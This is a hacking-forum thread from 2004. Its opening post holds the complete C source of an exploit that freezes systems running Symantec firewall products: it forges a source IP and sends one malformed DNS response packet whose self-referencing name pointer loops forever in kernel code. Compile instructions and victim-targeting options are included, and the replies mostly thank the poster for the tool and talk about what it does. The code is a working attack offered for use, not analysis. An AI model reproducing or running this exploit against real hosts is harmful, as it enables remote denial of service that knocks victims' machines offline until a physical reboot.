Hod-symantec-firewall-dos-expl.c

Anarchy

May 15 2004, 05:02 AM

CODE

/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
*
* Bug discoveried by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
* - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Personal Firewall 2002
* - Symantec Norton Personal Firewall 2003
* - Symantec Norton Personal Firewall 2004
* - Symantec Client Firewall 5.01, 5.1.1
* - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
* - Symantec Norton AntiSpam 2004
*
* -------------------------------------------------------------------
* Description:
* eEye Digital Security has discovered a second vulnerability
* in the Symantec firewall product line that can be remotely
* exploited to cause a severe denial-of-service condition on
* systems running a default installation of an affected version
* of the product. By sending a single malicious DNS (UDP port 53)
* response packet to a vulnerable host, an attacker can cause
* the Symantec DNS response validation code to enter an infinite
* loop within the kernel, amounting to a system freeze that requires
* the machine to be physically rebooted in order to restore operation.
*
* -------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
* Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib
* Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]
*
* -fi:IP From (sender) IP address
* -tp:int To (recipient) port number
* -ti:IP To (recipient) IP address
* -n:int Number of times to send message
*
*/

#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <stdio.h>
#include <stdlib.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#endif

#define MAX_MESSAGE 4068
#define MAX_PACKET 4096

#define DEFAULT_PORT 53
#define DEFAULT_IP "10.0.0.1"
#define DEFAULT_COUNT 1

#ifndef _WIN32
# define FAR
#endif

/* Define the DNS header */
char dnsreply[] =
"\xc9\x9c" /* Transaction ID */
"\x80\x00" /* Flags (bit 15: response) */
"\x00\x01" /* Number of questions */
"\x00\x01" /* Number of answer RRs */
"\x00\x00" /* Number of authority RRs */
"\x00\x00" /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer to itself */

/* Define the IP header */
typedef struct ip_hdr {
unsigned char ip_verlen; /* IP version & length */
unsigned char ip_tos; /* IP type of service */
unsigned short ip_totallength; /* Total length */
unsigned short ip_id; /* Unique identifier */
unsigned short ip_offset; /* Fragment offset field */
unsigned char ip_ttl; /* Time to live */
unsigned char ip_protocol; /* Protocol */
unsigned short ip_checksum; /* IP checksum */
unsigned int ip_srcaddr; /* Source address */
unsigned int ip_destaddr; /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header */
typedef struct udp_hdr {
unsigned short src_portno; /* Source port number */
unsigned short dst_portno; /* Destination port number */
unsigned short udp_length; /* UDP packet length */
unsigned short udp_checksum; /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;

/* globals */
unsigned long dwToIP, // IP to send to
dwFromIP; // IP to send from (spoof)
unsigned short iToPort, // Port to send to
iFromPort; // Port to send from (spoof)
unsigned long dwCount; // Number of times to send
char strMessage[MAX_MESSAGE]; // Message to send

void
usage(char *progname) {
printf("Usage:\n\n");
printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname);
printf(" -fi:IP From (sender) IP address\n");
printf(" -tp:int To (recipient) open UDP port number:\n");
printf(" 137, 138, 445, 500(default)\n");
printf(" -ti:IP To (recipient) IP address\n");
printf(" -n:int Number of times\n");
exit(1);
}

void
ValidateArgs(int argc, char **argv)
{
int i;

iToPort = 500;
iFromPort = DEFAULT_PORT;
dwToIP = inet_addr(DEFAULT_IP);
dwFromIP = inet_addr(DEFAULT_IP);
dwCount = DEFAULT_COUNT;
memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

for(i = 1; i < argc; i++) {
if ((argv[i][0] == '-') || (argv[i][0] == '/')) {
switch (tolower(argv[i][1])) {
case 'f':
switch (tolower(argv[i][2])) {
case 'i':
if (strlen(argv[i]) > 4)
dwFromIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 't':
switch (tolower(argv[i][2])) {
case 'p':
if (strlen(argv[i]) > 4)
iToPort = atoi(&argv[i][4]);
break;
case 'i':
if (strlen(argv[i]) > 4)
dwToIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 'n':
if (strlen(argv[i]) > 3)
dwCount = atol(&argv[i][3]);
break;
default:
usage(argv[0]);
break;
}
}
}
return;
}

/* This function calculates the 16-bit one's complement sum */
/* for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
unsigned long cksum=0;

while (size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size) {
cksum += *(unsigned char *)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);

return (unsigned short)(~cksum);
}

int
main(int argc, char **argv)
{
#ifdef _WIN32
WSADATA wsd;
#endif
int s;
#ifdef _WIN32
BOOL bOpt;
#else
int bOpt;
#endif
struct sockaddr_in remote;
IP_HDR ipHdr;
UDP_HDR udpHdr;
int ret;
unsigned long i;
unsigned short iTotalSize,
iUdpSize,
iUdpChecksumSize,
iIPVersion,
iIPSize,
cksum = 0;
char buf[MAX_PACKET],
*ptr = NULL;
#ifdef _WIN32
IN_ADDR addr;
#else
struct sockaddr_in addr;
#endif

printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n");
printf("Bug discoveried by eEye:\n");
printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

if (argc < 3) usage(argv[0]);

/* Parse command line arguments and print them out */
ValidateArgs(argc, argv);
#ifdef _WIN32
addr.S_un.S_addr = dwFromIP;
printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort);
addr.S_un.S_addr = dwToIP;
printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort);
printf("[*] Count: %d\n", dwCount);
#else
addr.sin_addr.s_addr = dwFromIP;
printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort);
addr.sin_addr.s_addr = dwToIP;
printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort);
printf("[*] Count: %d\n", dwCount);
#endif

#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
printf("[-] WSAStartup() failed: %d\n", GetLastError());
return -1;
}
#endif
/* Creating a raw socket */
s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
if (s == INVALID_SOCKET) {
printf("[-] WSASocket() failed: %d\n", WSAGetLastError());
return -1;
}
#endif

/* Enable the IP header include option */
#ifdef _WIN32
bOpt = TRUE;
#else
bOpt = 1;
#endif
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
if (ret == SOCKET_ERROR) {
printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
return -1;
}
#endif
/* Initalize the IP header */
iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;

iIPVersion = 4;
iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
ipHdr.ip_tos = 0; /* IP type of service */
ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */
ipHdr.ip_id = 0; /* Unique identifier: set to 0 */
ipHdr.ip_offset = 0; /* Fragment offset field */
ipHdr.ip_ttl = 128; /* Time to live */
ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */
ipHdr.ip_checksum = 0; /* IP checksum */
ipHdr.ip_srcaddr = dwFromIP; /* Source address */
ipHdr.ip_destaddr = dwToIP; /* Destination address */

/* Initalize the UDP header */
iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1;

udpHdr.src_portno = htons(iFromPort);
udpHdr.dst_portno = htons(iToPort);
udpHdr.udp_length = htons(iUdpSize);
udpHdr.udp_checksum = 0;

iUdpChecksumSize = 0;
ptr = buf;
memset(buf, 0, MAX_PACKET);

memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr));
ptr += sizeof(ipHdr.ip_srcaddr);
iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr));
ptr += sizeof(ipHdr.ip_destaddr);
iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

ptr++;
iUdpChecksumSize += 1;

memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol));
ptr += sizeof(ipHdr.ip_protocol);
iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length));
ptr += sizeof(udpHdr.udp_length);
iUdpChecksumSize += sizeof(udpHdr.udp_length);

memcpy(ptr, &udpHdr, sizeof(udpHdr));
ptr += sizeof(udpHdr);
iUdpChecksumSize += sizeof(udpHdr);

for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++)
*ptr = strMessage[i];
iUdpChecksumSize += sizeof(dnsreply)-1;

cksum = checksum((unsigned short *)buf, iUdpChecksumSize);
udpHdr.udp_checksum = cksum;

memset(buf, 0, MAX_PACKET);
ptr = buf;

memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);
memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr);
memcpy(ptr, strMessage, sizeof(dnsreply)-1);

remote.sin_family = AF_INET;
remote.sin_port = htons(iToPort);
remote.sin_addr.s_addr = dwToIP;

for(i = 0; i < dwCount; i++) {
#ifdef _WIN32
ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,
sizeof(remote));

if (ret == SOCKET_ERROR) {
printf("[-] sendto() failed: %d\n", WSAGetLastError());
break;
} else
#else
ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,
sizeof(remote));
#endif
printf("[+] sent %d bytes\n", ret);
}

#ifdef _WIN32
closesocket(s);
WSACleanup();
#endif

return 0;
}

midi69

May 15 2004, 06:56 AM

thx alot mate
is that just came with shell?
didnt notice that

FLAT

May 15 2004, 09:34 AM

no if you have read the code of the exploit you would know that this is just a ddos exploit ... so just to (filtered) people

DevilM

May 15 2004, 03:56 PM

But what if he doesn't know abaout reading the code? If he just read "exploit" and thought of "getting a shell" and stuff like that?

morbido

May 15 2004, 05:16 PM

lol
this board is full of n00bs

getting a shell on a DOS

tweakz20

May 15 2004, 06:28 PM

QUOTE (DevilM @ May 15 2004, 03:56 PM)

But what if he doesn't know abaout reading the code? If he just read "exploit" and thought of "getting a shell" and stuff like that?

um, the code is really long and just sitting there, don't you think people would get the impression "Wow. This is an exploit source for one of the major AV companies... Maybe I'll READ IT!"

anyway, i wonder how much these eEye guys get paid, these guys are such good programmers.... i don't get why they have the default port as
#define DEFAULT_IP "10.0.0.1"
though... shouldn't it just stop cold if no ip is given?

FiNaLBeTa

May 15 2004, 07:16 PM

QUOTE (tweakz20 @ May 15 2004, 06:28 PM)

QUOTE (DevilM @ May 15 2004, 03:56 PM)

But what if he doesn't know abaout reading the code? If he just read "exploit" and thought of "getting a shell" and stuff like that?

um, the code is really long and just sitting there, don't you think people would get the impression "Wow. This is an exploit source for one of the major AV companies... Maybe I'll READ IT!"

anyway, i wonder how much these eEye guys get paid, these guys are such good programmers.... i don't get why they have the default port as
#define DEFAULT_IP "10.0.0.1"
though... shouldn't it just stop cold if no ip is given?

The advisory comes from eye security.
It dos not say the code comes from them, tho it could be.

Zero-X

May 15 2004, 07:52 PM

well it seems that it's only gonna freeze the shit until they reboot...

tweakz20

May 15 2004, 08:03 PM

* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.

yeah, sorry, you're right... they're still really good programmers to find these vulnerabilities

xoro

May 16 2004, 01:13 PM

Hi !

Thanks for this tool

Ecko

May 17 2004, 06:51 PM

@tweakz20

#define DEFAULT_PORT 53
#define DEFAULT_IP "10.0.0.1"
#define DEFAULT_COUNT 1

its only the default ip and port...if you choose another then its another

but why enter the own ip?